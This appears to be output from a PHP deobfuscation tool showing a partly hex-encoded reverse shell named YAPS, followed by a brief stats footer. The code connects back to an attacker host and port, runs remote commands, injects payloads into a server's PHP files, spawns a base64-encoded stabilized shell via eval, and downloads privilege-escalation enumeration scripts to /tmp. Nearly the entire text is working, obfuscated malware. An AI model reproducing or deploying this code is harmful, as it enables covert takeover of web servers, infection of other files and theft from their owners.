72\162\x61\x79\x28\x24\147\x5b\61\x5d\54\x24\x69\x29\x29\x66\167\162\151\x74\145\x28\x24\142\x2c\x66\162\145\x61\144\x28\44\147\x5b\61\135\x2c\x32\60\x34\70\51\x29\73\151\x66\x28\x69\156\x5f\141\162\x72\x61\171\50\x24\147\133\62\135\x2c\x24\151\51\x29\x66\x77\x72\x69\x74\145\x28\x24\142\54\x66\162\145\x61\x64\50\x24\147\133\62\135\x2c\x32\x30\x34\70\x29\51\73\x7d\146\143\x6c\157\163\145\x28\44\142\51\73\x66\x6f\162\x65\141\x63\x68\50\x24\147\40\141\x73\x20\44\160\51\146\143\x6c\157\x73\145\x28\44\160\x29\x3b\160\x72\157\143\x5f\x63\154\x6f\x73\x65\x28\44\x66\51\73\x3f\76"); fwrite($s, cyan("\12\x5b\x69\x5d\x20") . white("\x4c\x69\163\x74\40\x6f\146\x20\160\x61\171\x6c\x6f\x61\144\x73\40\x61\166\141\x69\154\141\x62\x6c\145\72\12")); $i = true; foreach ($payloads as $name => $code) { $desc = $i ? cyan($name) . $code : cyan($name) . white($code); fwrite($s, $desc . "\12"); $i = !$i; } fwrite($s, cyan("\12\x5b\x3f\135\40") . white("\x43\x68\x6f\157\163\x65\x20\x61\x20\x70\x61\x79\x6c\x6f\x61\144\x20\164\157\40\x69\x6e\146\x65\143\164\40\164\150\x65\40\x73\x65\x6c\145\143\164\x65\144\x20\x66\x69\154\145\x73\x20\50\144\x65\146\141\x75\154\164\x3a\x30\x29\x3a\40")); while ($choosed_payload = fread($s, 128)) { $user_payload = 0; if ((int) $choosed_payload <= count($payloads) + 1) { $user_payload = $choosed_payload; } break; } fwrite($s, cyan("\x5b\77\x5d\x20") . 
white("\x44\x6f\40\171\157\165\x20\x77\141\156\x74\x20\x64\x6f\x20\151\156\163\x65\x72\x74\40\x74\150\145\40\x70\x61\x79\x6c\x6f\141\144\40\x61\x74\x20\x74\x68\145\40\x62\x65\147\x69\156\x6e\x69\156\x67\x20\133\x30\135\x20\x6f\162\x20\145\x6e\144\40\133\x31\135\x20\x6f\146\40\164\150\x65\x20\146\151\x6c\x65\40\50\x64\x65\x66\x61\165\154\164\72\40\61\x29\x3f\40")); while ($position = fread($s, 128)) { $position = 1; if ((int) $position === 0) { $position = 0; } break; } infect($allFiles, $toInfect, (int) $user_payload, $payloads, (int) $position); return; } goto vng9E; x3nOo: function white($str) { global $color; return $color ? "\x1b\x5b\x39\x37\155" . $str . "\x1b\x5b\60\x6d" : $str; } goto ixO3W; r2M4e: function suggester() { global $s, $resources; $download = download($resources["\x73\x75\147\x67\x65\163\164\x65\x72"], "\x2f\x74\x6d\x70\57"); if ($download) { fwrite($s, green("\x5b\53\x5d") . "\x20\114\x69\x6e\x75\x78\40\x45\x78\x70\x6c\157\151\164\x20\123\165\147\x67\x65\163\164\x65\162\x20\163\x61\166\145\144\40\164\x6f\x20\x2f\x74\x6d\160\57" . $download . cyan("\12\x5b\x69\135") . "\40\x43\150\x61\156\x67\x69\156\x67\x20\160\x65\x72\x6d\x69\163\163\151\157\x6e\x73\x2e\56\56\12"); if (chmod("\57\x74\x6d\160\57" . $download, 777)) { fwrite($s, green("\x5b\x2b\135") . "\40\120\x65\162\x6d\151\x73\x73\151\x6f\x6e\x73\40\143\150\141\x6e\147\145\144\x21\40\12\x5b\x69\x5d\x20\131\x6f\x75\40\143\141\x6e\40\x72\x75\156\x20\151\x74\40\x77\151\164\x68\40" . yellow("\163\x68\40\57\164\155\160\x2f" . $download . "\40\174\40\x74\x65\x65\40\x2f\x74\155\x70\x2f\x4c\105\123\56\x6c\157\147\xa")); } else { fwrite($s, yellow("\133\41\x5d") . "\x20\x43\x6f\x75\154\x64\x6e\x27\164\40\143\x68\141\x6e\x67\145\40\160\x65\x72\x6d\x69\x73\163\151\x6f\x6e\x73\56\x2e\x2e\x20\xa\x5b\151\135\x20\x46\151\154\x65\40\167\x61\x73\x20\163\x61\166\145\x64\x20\151\x6e\40" . yellow("\57\x74\x6d\160\57" . $download . 
"\xa")); } } return; } goto Wuvgt; iWGdZ: function backdoor() { } goto ZqmNp; VcfR6: function connect() { global $use_password, $commands, $ps1, $s, $silent; refresh_ps1(1); if (!isAvailable("\146\163\157\143\x6b\157\160\145\x6e")) { die(red("\133\x2d\x5d") . "\x20\106\165\x6e\x63\164\x69\x6f\x6e\40\x27\x66\x73\157\143\x6b\157\x70\145\156\x27\40\151\163\x6e\47\x74\40\141\x76\141\151\154\141\x62\x6c\x65\x2e"); } if ($use_password) { if (!check_password()) { die(fwrite($s, red("\x5b\x2d\135") . "\40\127\162\157\156\147\x20\x70\x61\163\163\x77\x6f\x72\x64\x2e\12")); } } if (!isset($_REQUEST["\163\151\x6c\x65\x6e\164"]) && !isset($_REQUEST["\163"]) && !$silent) { fwrite($s, banner() . "\12"); } refresh_ps1(); fwrite($s, "\12" . $ps1); while ($c = fread($s, 2048)) { $out = ''; if (substr($c, 0, 1) == "\41") { if (in_array(strtolower(substr($c, 1, -1)), $commands)) { $out = parse_stdin($c); } else { cmd_not_found(substr($c, 1, -1)); } } elseif (substr($c, 0, 3) == "\x63\x64\x20") { chdir(substr($c, 3, -1)); } elseif (substr($c, 0, -1) == "\x65\170\x69\x74") { fwrite($s, yellow("\x5b\151\x5d\x20") . "\103\x6c\157\163\x69\x6e\147\x20\x63\x6f\x6e\156\145\143\x74\151\157\156\x2e\xa"); fclose($s); die; } else { $out = run_cmd(substr($c, 0, -1)); } if ($out === false) { fwrite($s, red("\x5b\55\135\x20\124\x68\145\x72\145\x20\x61\162\x65\40\x6e\x6f\x20\145\170\145\143\40\146\x75\156\x63\x74\151\157\x6e\163")); break; } refresh_ps1(); fwrite($s, $out . $ps1); } fclose($s); } goto SqGTY; ixO3W: function banner() { global $banner; return $banner . white("\xa\40\40\40\x54\150\151\163\40\151\163\x20") . red("\x4e\x4f\x54") . white("\x20\x61\156\40\151\x6e\x74\x65\x72\x61\x63\x74\151\x76\x65\x20\x73\150\145\154\x6c\x2e\xa\x20\x20\40\40\x20\40\40\125\163\x65\40") . green("\41\150\145\154\x70") . white("\40\164\157\40\x73\145\x65\40\143\x6f\x6d\x6d\141\x6e\144\x73\x2e"); } goto uIseZ; LavC2: function help() { $help = "\12" . 
green("\125\163\x65\x66\x75\154\40\143\157\155\x6d\x61\x6e\x64\x73\72") . "\12\40\40" . cyan("\x21\x68\x65\154\x70") . "\12\40\40\x9\x44\151\x73\x70\x6c\141\x79\40\164\150\x69\x73\x20\x6d\x65\x6e\x75\12\x20\40" . cyan("\x21\x61\x6c\x6c\55\143\157\x6c\157\162\163") . "\xa\40\x20\x9\x54\x6f\147\x67\154\145\x20\x61\x6c\x6c\x20\x63\157\x6c\157\162\x73\x20\50\x6c\157\x63\x61\154\154\171\x20\157\x6e\x6c\171\51\xa\x20\40" . cyan("\41\x63\x6f\154\157\x72") . "\xa\40\x20\11\124\x6f\x67\x67\154\145\40\x24\120\123\x31\40\x63\157\x6c\157\x72\x20\x28\154\x6f\143\x61\x6c\x6c\171\x20\x6f\x6e\154\x79\51\12\40\x20" . cyan("\41\144\165\160\154\151\143\x61\x74\145") . "\xa\x20\40\x9\x53\160\141\x77\x6e\40\141\x6e\157\x74\150\x65\x72\x20\162\x65\166\x65\162\163\x65\x20\x73\x68\x65\x6c\x6c\xa\x20\40" . cyan("\41\145\156\x75\155") . "\xa\40\40\11\104\157\x77\x6e\x6c\x6f\x61\144\40\x4c\x69\x6e\x70\145\x61\163\40\x61\156\x64\40\114\151\156\145\x6e\x75\155\40\x74\157\40\x2f\x74\155\x70\40\141\x6e\144\x20\147\145\164\40\x69\164\40\x72\145\141\144\171\x20\164\x6f\40\x72\165\x6e\xa\40\x20" . cyan("\x21\x69\156\x66\x65\x63\164") . "\12\40\x20\x9\x49\x6e\x6a\145\x63\x74\40\x70\x61\x79\x6c\x6f\x61\x64\x73\x20\151\156\164\157\x20\x50\110\x50\x20\146\x69\154\145\163\xa\x20\40" . cyan("\x21\151\156\146\157") . "\xa\x20\x20\11\114\x69\x73\164\40\151\x6e\x66\x6f\162\x6d\141\x74\151\157\x6e\x20\x61\142\x6f\x75\164\40\164\141\162\x67\145\x74\12\40\x20" . cyan("\41\160\x61\163\163\167\x64") . "\xa\40\x20\11\x53\x68\x6f\167\40\x6f\160\164\x69\x6f\x6e\163\x20\146\157\x72\40\x70\x61\163\163\167\157\162\x64\11\12\40\40" . cyan("\x21\x70\150\x70") . "\xa\40\40\11\127\162\151\164\145\40\x61\156\144\40\x72\x75\156\40\120\110\120\40\x63\157\x64\145\40\x6f\156\x20\164\x68\x65\40\x72\145\155\157\x74\x65\x20\150\157\x73\x74\xa\40\40" . cyan("\x21\163\x74\x61\142\x69\x6c\151\x7a\145") . 
"\xa\x20\40\11\123\164\141\142\x69\x6c\x69\172\145\40\164\x6f\40\141\x6e\40\151\x6e\164\145\x72\141\143\x74\151\x76\145\40\163\150\x65\x6c\x6c\12\40\40" . cyan("\41\163\x75\x67\x67\x65\x73\164\x65\162") . "\12\40\40\11\104\x6f\x77\x6e\154\x6f\141\144\40\114\151\156\165\x78\x20\105\x78\160\154\157\x69\164\x20\123\165\147\x67\145\163\164\x65\162\40\164\x6f\x20\57\164\x6d\x70\40\x61\x6e\x64\x20\x67\x65\164\40\x69\x74\40\162\x65\141\x64\x79\40\164\157\x20\x72\x75\156\12\40\x20\12" . green("\x43\x6f\x6d\155\x61\156\x64\40\x6c\x69\156\x65\40\x6f\160\164\x69\157\156\163\72") . "\12\40\40" . white("\x24\x20\160\150\160\x20\x79\141\x70\x73\56\x70\150\160\x20\133\55\x2d\165\160\x64\141\x74\x65\x7c\x2d\165\x5d") . "\12\x20\40\x9\103\150\145\143\x6b\40\x69\x66\40\131\x41\120\123\x20\151\163\x20\x75\x70\x20\164\x6f\x20\x64\141\164\145\12\x20\40" . white("\44\40\x70\x68\x70\40\171\x61\x70\x73\56\160\x68\x70\x20\x69\x70\x20\x70\x6f\162\x74") . "\12\x20\x20\x9\x43\x6f\x6e\x6e\145\x63\164\x20\x74\157\x20\x69\160\72\160\157\162\x74\xa"; return $help; } goto efuXl; TWD7O: function isAvailable($function) { $dis = ini_get("\x64\x69\163\141\x62\154\x65\137\x66\165\156\143\x74\x69\157\156\x73"); if (!empty($dis)) { $dis = preg_replace("\x2f\133\x2c\40\135\53\57", "\54", $dis); $dis = explode("\54", $dis); $dis = array_map("\x74\x72\151\155", $dis); } else { $dis = array(); } if (is_callable($function) and !in_array($function, $dis)) { return true; } return false; } goto LavC2; uFC47: function red($str) { global $color; return $color ? "\x1b\x5b\x39\61\155" . $str . "\x1b\133\x30\x6d" : $str; } goto SQe5k; MIocV: function verify_update() { global $version, $resources; $newest_version = 0; echo cyan("\133\151\135\x20") . 
"\131\157\165\x72\x20\166\145\162\163\151\157\156\72\40{$version}\x2e\40\x43\x68\145\x63\153\x69\156\147\40\x66\x6f\162\x20\x75\x70\x64\x61\164\145\163\56\56\56\xa"; $request = get_request($resources["\166\x65\x72\151\x66\x79\125\160\x64\x61\164\x65\x55\122\114"]); if ($request) { $newest_version = $request; } $newest_version_ = (int) str_replace("\x2e", '', $newest_version); $version_ = (int) str_replace("\56", '', $version); if ($newest_version_ !== 0 && $newest_version_ > $version_) { echo red("\x5b\x69\135") . "\x20\131\x6f\x75\x72\40\166\145\x72\x73\x69\157\x6e\40\151\163\40\156\x6f\x74\x20\x75\x70\x20\164\157\x20\x64\141\164\x65\x2e\12" . green("\x5b\104\117\127\x4e\114\x4f\101\104\40\x76" . str_replace("\xa", '', $newest_version) . "\x5d\x3a\x20") . $resources["\165\160\x64\141\164\145\125\x52\114"] . "\xa"; return; } echo green("\133\x2b\x5d\x20") . "\x59\101\120\123\40\151\163\40\x61\154\x72\x65\x61\144\171\40\x75\160\40\164\x6f\40\144\141\x74\145\x20\x28\166{$version}\51\x21\xa"; return; } goto jsOgp; Wym75: function stabilize($post_socket = '') { global $s, $port, $ip; $payload = 
"\x4a\x48\x4e\152\143\x6d\154\x77\x64\x44\x31\172\141\107\x56\163\x62\106\x39\x6c\145\107\x56\152\x4b\x43\112\x33\x61\x47\154\x6a\141\103\102\172\131\63\112\160\143\x48\121\x69\x4b\x54\x73\153\x63\110\153\172\120\130\x4e\157\x5a\x57\x78\x73\x58\62\x56\x34\132\127\115\x6f\111\156\x64\x6f\x61\x57\x4e\157\x49\110\x42\x35\144\107\150\166\142\152\x4d\x69\x4b\x54\x73\x6b\x63\x48\153\71\x63\62\150\x6c\142\107\170\x66\x5a\130\x68\x6c\131\x79\x67\151\x64\x32\150\x70\x59\x32\147\x67\x63\x48\154\x30\x61\107\x39\x75\111\151\x6b\67\x61\127\x59\x6f\x63\x33\122\171\x62\107\126\x75\113\x43\x52\172\x59\63\x4a\x70\x63\x48\121\160\x50\x6a\131\147\112\151\131\147\x63\63\122\x79\143\x47\x39\x7a\113\x43\122\x7a\x59\63\112\160\143\110\121\163\x49\155\65\166\144\103\x42\155\x62\x33\x56\165\x5a\x43\x49\160\120\x54\61\155\131\x57\170\172\132\x53\153\147\112\x48\x4e\60\x59\x57\112\x70\142\x47\154\66\x5a\x58\x49\x39\111\151\x39\x69\141\127\64\x76\x59\x6d\x46\x7a\141\x43\101\x74\131\62\153\x67\x4a\x79\111\165\x4a\110\116\x6a\143\x6d\x6c\167\144\103\64\x69\111\103\x31\x78\x59\171\101\x76\x59\155\154\x75\x4c\x32\112\x68\x63\x32\147\x67\114\62\122\154\144\x69\x39\x75\144\127\x78\x73\x4a\x79\x49\67\132\127\x78\x7a\x5a\123\102\160\132\151\150\172\x64\x48\x4a\163\132\127\x34\157\112\x48\x42\x35\115\171\x6b\53\116\x79\101\x6d\x4a\151\x42\x7a\144\x48\x4a\167\x62\63\115\157\x4a\110\116\x6a\x63\x6d\x6c\167\x64\103\167\151\142\155\71\60\111\x47\132\166\144\127\65\x6b\111\151\x6b\x39\120\x57\132\x68\x62\110\116\154\113\x53\101\x6b\x63\63\x52\150\x59\155\154\163\141\130\160\154\x63\152\60\x6b\143\110\153\x7a\114\x69\x49\x67\x4c\127\115\x67\x4a\x32\x6c\x74\143\x47\71\x79\144\x43\x42\x77\x64\110\153\67\x63\110\122\x35\x4c\156\116\x77\x59\x58\144\165\113\106\167\151\x4c\x32\112\x70\142\151\71\151\x59\x58\x4e\157\130\x43\111\x70\x4a\x79\111\67\132\127\170\172\x5a\x53\102\160\x5a\151\150\172\x64\x48\112\163\132\x57\x34\157\x4a\x48\102\x35\x4b\124\x34\x32\111\x43\131\x6d\x49\x48\x4e\x30\x63\x6e\102\166\x63\x79\x6
7\x6b\x63\x32\116\171\141\130\102\60\x4c\x43\x4a\x75\x62\x33\x51\147\x5a\155\x39\x31\x62\155\x51\x69\x4b\x54\x30\x39\x5a\155\106\x73\x63\x32\125\160\111\103\122\x7a\144\107\106\151\141\x57\x78\x70\x65\x6d\126\171\x50\123\x52\167\x65\x53\64\151\111\x43\x31\152\x49\103\x64\x70\142\x58\102\x76\143\156\x51\147\143\x48\122\x35\117\63\102\x30\x65\123\65\x7a\143\x47\106\x33\x62\x69\150\143\x49\151\x39\151\141\127\64\166\x59\x6d\106\172\141\106\167\x69\x4b\123\x63\151\117\x32\x56\163\143\62\x55\x67\x4a\110\x4e\60\131\x57\x4a\160\x62\x47\154\66\x5a\130\111\x39\111\151\x39\151\x61\x57\64\x76\x59\x6d\106\x7a\141\x43\x49\67\112\110\x4e\x30\131\x57\x4a\x70\142\107\x6c\x36\132\130\x49\x39\x63\x33\122\171\x58\63\112\x6c\x63\x47\x78\x68\131\x32\125\157\x49\154\x78\x75\111\x69\167\x69\111\x69\167\153\x63\63\122\150\x59\x6d\x6c\x73\141\x58\160\154\x63\151\x6b\x37\112\x48\x4e\157\132\127\170\163\x50\x53\x4a\61\142\155\x46\164\132\123\x41\x74\x59\124\x73\x6b\143\63\122\150\x59\155\154\163\x61\130\160\x6c\x63\151\111\67\144\127\x31\x68\x63\x32\163\x6f\115\x43\153\67\112\x48\116\x76\x59\62\x73\71\x5a\x6e\116\166\x59\x32\x74\166\143\107\x56\x75\113\103\112\x4a\125\106\x39\x42\x52\105\122\123\111\x69\x78\121\x54\x31\x4a\x55\x4c\x43\122\154\x63\x6e\112\x75\x62\171\167\153\x5a\x58\112\171\x63\63\x52\x79\114\x44\x4d\x77\113\x54\163\x6b\x63\x33\122\x6b\x50\x57\x46\x79\x63\x6d\x46\65\113\103\101\x77\x49\x44\60\x2b\x49\x47\x46\x79\143\x6d\106\65\x4b\103\x4a\167\x61\x58\x42\154\111\x69\167\x69\x63\x69\x49\x70\114\104\105\147\120\x54\64\147\x59\130\x4a\171\131\130\x6b\157\111\x6e\102\x70\x63\x47\x55\x69\x4c\x43\x4a\x33\x49\151\153\x73\x4d\x69\101\x39\120\151\102\150\143\x6e\112\150\x65\123\147\x69\x63\107\x6c\167\132\123\111\163\x49\156\143\x69\113\x53\x41\x70\117\x79\x52\x77\x63\155\x39\x6a\x5a\130\116\x7a\120\x58\x42\171\x62\x32\x4e\146\142\x33\x42\x6c\142\x69\x67\153\143\x32\x68\x6c\142\107\167\x73\x4a\110\x4e\x30\132\103\167\153\x63\107\154\x77\132\130\x4d\x70\117\62\132\166\143\x6d\126\150\x5
9\x32\147\157\x4a\110\102\160\143\107\x56\x7a\x49\x47\x46\x7a\x49\x43\122\x77\113\123\x42\172\x64\x48\x4a\154\131\127\x31\146\143\x32\x56\60\x58\x32\x4a\163\x62\x32\116\162\141\x57\65\x6e\113\103\122\x77\x4c\x44\101\160\x4f\x33\116\60\143\x6d\126\150\142\x56\x39\172\x5a\130\122\x66\131\x6d\170\x76\x59\62\x74\160\142\x6d\x63\157\112\110\x4e\x76\x59\x32\163\x73\x4d\x43\153\x37\x64\62\x68\x70\x62\x47\125\157\x49\127\132\154\x62\x32\x59\x6f\x4a\x48\x4e\x76\x59\62\x73\x70\x4b\130\x73\153\143\x6d\126\x68\132\106\71\150\x50\x57\106\171\143\155\x46\65\113\103\x52\x7a\142\x32\116\x72\x4c\103\122\x77\x61\130\x42\154\143\x31\x73\170\x58\123\167\x6b\143\107\x6c\167\132\130\x4e\x62\115\154\60\160\117\62\x6c\155\113\107\154\165\130\x32\x46\171\x63\x6d\106\65\x4b\103\x52\172\x62\62\116\162\114\103\122\x79\x5a\127\106\153\x58\x32\x45\x70\x4b\x53\102\155\x64\x33\112\x70\x64\107\x55\x6f\112\x48\x42\x70\x63\107\x56\x7a\x57\172\x42\x64\x4c\x47\132\171\132\x57\106\153\113\103\x52\172\142\62\116\162\x4c\x44\111\167\x4e\104\x67\160\x4b\124\x74\160\132\151\150\x70\x62\154\71\150\x63\x6e\112\x68\145\123\x67\153\x63\x47\154\x77\x5a\x58\116\142\x4d\x56\60\x73\112\x48\x4a\154\131\127\x52\146\131\x53\153\160\x49\x47\132\63\143\155\154\60\x5a\123\x67\x6b\143\62\71\152\x61\x79\170\x6d\143\x6d\126\x68\132\x43\x67\x6b\143\x47\154\167\132\x58\x4e\x62\x4d\x56\60\163\115\152\x41\x30\117\103\153\x70\117\x32\x6c\155\x4b\x47\154\x75\130\62\106\x79\143\x6d\x46\65\113\103\122\x77\x61\x58\102\154\x63\61\163\x79\130\x53\x77\x6b\143\155\126\150\x5a\106\71\150\113\x53\x6b\147\132\156\144\x79\141\130\122\x6c\113\x43\122\x7a\142\62\x4e\162\x4c\107\x5a\x79\x5a\x57\106\153\113\103\122\167\141\x58\102\154\x63\x31\163\x79\x58\123\x77\x79\x4d\104\x51\64\x4b\x53\x6b\67\x66\x53\102\x6d\x59\62\x78\166\143\x32\125\x6f\x4a\110\116\166\131\x32\163\x70\117\x32\x5a\166\143\155\x56\150\x59\x32\147\x6f\x4a\110\x42\160\143\107\x56\x7a\x49\x47\106\x7a\x49\103\122\167\x4b\x53\x42\x6d\x59\62\170\166\x63\x32\125\157\112\x48\x41\160
\x4f\x33\x42\171\142\62\116\146\131\x32\170\x76\143\62\x55\157\x4a\x48\102\x79\142\62\x4e\x6c\143\63\115\160\117\x77\x3d\75"; if (strlen($post_socket) > 1 && strlen($post_socket) > 0) { echo $post_socket; $skt = explode("\x3a", $post_socket); $post_ip = $skt[0]; $post_port = $skt[1]; $final_payload = base64_encode(str_replace("\111\x50\x5f\x41\x44\x44\122", $post_ip, str_replace("\120\117\x52\x54", $post_port, base64_decode($payload)))); shell_exec("\x65\x63\x68\x6f\40" . $final_payload . "\x7c\40\142\x61\163\x65\66\x34\40\55\144\x20\x7c\x20\x70\150\160\x20\55\x72\40\x27\x24\163\x74\144\x69\156\75\146\x69\154\x65\x28\42\x70\150\160\x3a\x2f\x2f\x73\164\144\151\x6e\42\x29\73\145\x76\x61\x6c\x28\x24\163\x74\144\x69\156\x5b\x30\135\x29\x3b\x27"); return; } fwrite($s, yellow("\x5b\151\x5d") . "\40\123\x65\x74\x20\165\160\40\x61\40\154\151\x73\164\145\156\145\162\x20\x6f\x6e\40\x61\x6e\157\x74\x68\x65\x72\x20\160\x6f\162\x74\40\x28\x6e\x63\x20\x2d\x6c\x6e\x76\x70\40\x3c\160\157\x72\x74\x3e\x29\x20\x61\x6e\x64\40\x70\x72\x65\x73\163\x20\105\116\124\105\122\x2e\12\x43\x68\x6f\157\163\x65\x20\x61\x20\160\x6f\x72\164\72\x20"); while ($c = fread($s, 8)) { if (strlen($c) > 0) { $recv_port = (int) $c; if ($recv_port > 65535 || $recv_port == 0) { fwrite($s, red("\x5b\55\x5d") . "\x20\120\157\x72\164\x20\155\165\163\164\40\142\145\x20\142\x65\164\x77\145\145\x6e\x20\x30\55\x36\65\x35\63\x35\x2e\xa\103\150\157\x6f\x73\x65\x20\x61\156\x6f\164\x68\145\162\x20\x70\157\x72\164\72\40"); } else { $final_payload = base64_encode(str_replace("\111\120\x5f\x41\x44\104\122", $ip, str_replace("\120\x4f\122\x54", $recv_port, base64_decode($payload)))); fwrite($s, yellow("\x5b\x69\x5d") . "\x20\x54\162\x79\151\x6e\147\x20\x74\x6f\x20\x63\x6f\156\156\145\143\x74\x20\164\x6f\x20{$ip}\x3a{$recv_port}\12"); if (isAvailable("\x70\157\160\x65\x6e") && isAvailable("\160\143\154\157\x73\145")) { pclose(popen("\145\x63\150\x6f\x20" . $final_payload . 
"\x7c\x20\142\x61\163\x65\x36\x34\x20\55\x64\x20\174\x20\x70\x68\160\x20\x2d\x72\40\47\x24\163\164\144\151\x6e\75\x66\x69\154\145\x28\42\160\150\160\72\x2f\57\163\x74\x64\x69\x6e\x22\51\73\x65\x76\x61\154\50\x24\x73\164\144\x69\156\133\x30\135\x29\73\x27\40\46", "\x72")); return; } $curl_url = $_SERVER["\122\x45\121\x55\x45\x53\x54\x5f\123\103\110\x45\115\x45"] . "\72\57\57" . $_SERVER["\x48\124\124\x50\x5f\x48\x4f\123\124"] . $_SERVER["\122\x45\121\125\105\x53\x54\137\x55\122\111"]; run_cmd("\164\x69\155\145\157\165\x74\x20\x2d\x2d\x6b\151\x6c\154\55\x61\146\164\x65\162\x20\x30\40\61\x20\167\x67\145\164\40\x2d\x2d\160\x6f\163\164\55\x64\x61\164\x61\75\42\170\75{$ip}\x3a{$recv_port}\x26\163\164\141\142\151\x6c\x69\x7a\x65\75\61\42\x20{$curl_url}\40\76\40\x2f\x64\145\x76\x2f\x6e\x75\154\154"); return; } } } } goto iWGdZ; p4M3a: $ps1_color = true; goto gCfG6; iyx8E: $options = getopt($short_args, $long_args); goto k28_t; j6Lb0: function cyan($str) { global $color; return $color ? "\x1b\x5b\x39\66\155" . $str . "\33\x5b\60\155" : $str; } goto x3nOo; SQe5k: function yellow($str) { global $color; return $color ? "\x1b\x5b\71\63\155" . $str . "\33\133\x30\x6d" : $str; } goto j6Lb0; FlzCk: $ps1 = "\133\x59\x41\120\123\135\x20" . str_replace(PHP_EOL, '', green(run_cmd("\x77\x68\157\141\155\x69") . "\x40" . run_cmd("\150\157\163\164\156\x61\155\x65")) . "\72" . cyan(run_cmd("\x70\167\144")) . "\44\x20"); goto wu7kB; xn2Of: $port = 7359; goto p4M3a; MwOOd: if (isset($options["\x73"]) || isset($options["\x73\x69\x6c\145\156\164"])) { $silent = true; } goto zJ69L; nPG3i: if (isset($_REQUEST["\163\164\x61\x62\x69\x6c\x69\x7a\x65"]) && $_REQUEST["\163\164\x61\x62\x69\x6c\x69\x7a\145"]) { $x = $_POST["\170"]; stabilize($x); } else { $s = @fsockopen("\x74\143\160\x3a\57\x2f{$ip}", $port); if (!$s) { die(red("\x5b\55\135\x20") . "\103\x6f\165\x6c\x64\156\47\164\40\x63\x6f\x6e\156\145\x63\164\x20\x74\157\40\x73\157\143\153\145\x74\x20{$ip}\x3a{$port}\56"); } connect(); }

Function Calls

None

Variables

None

Stats

MD5 707dbaa10b3822be578d1cc9049ec761
Eval Count 0
Decode Time 134 ms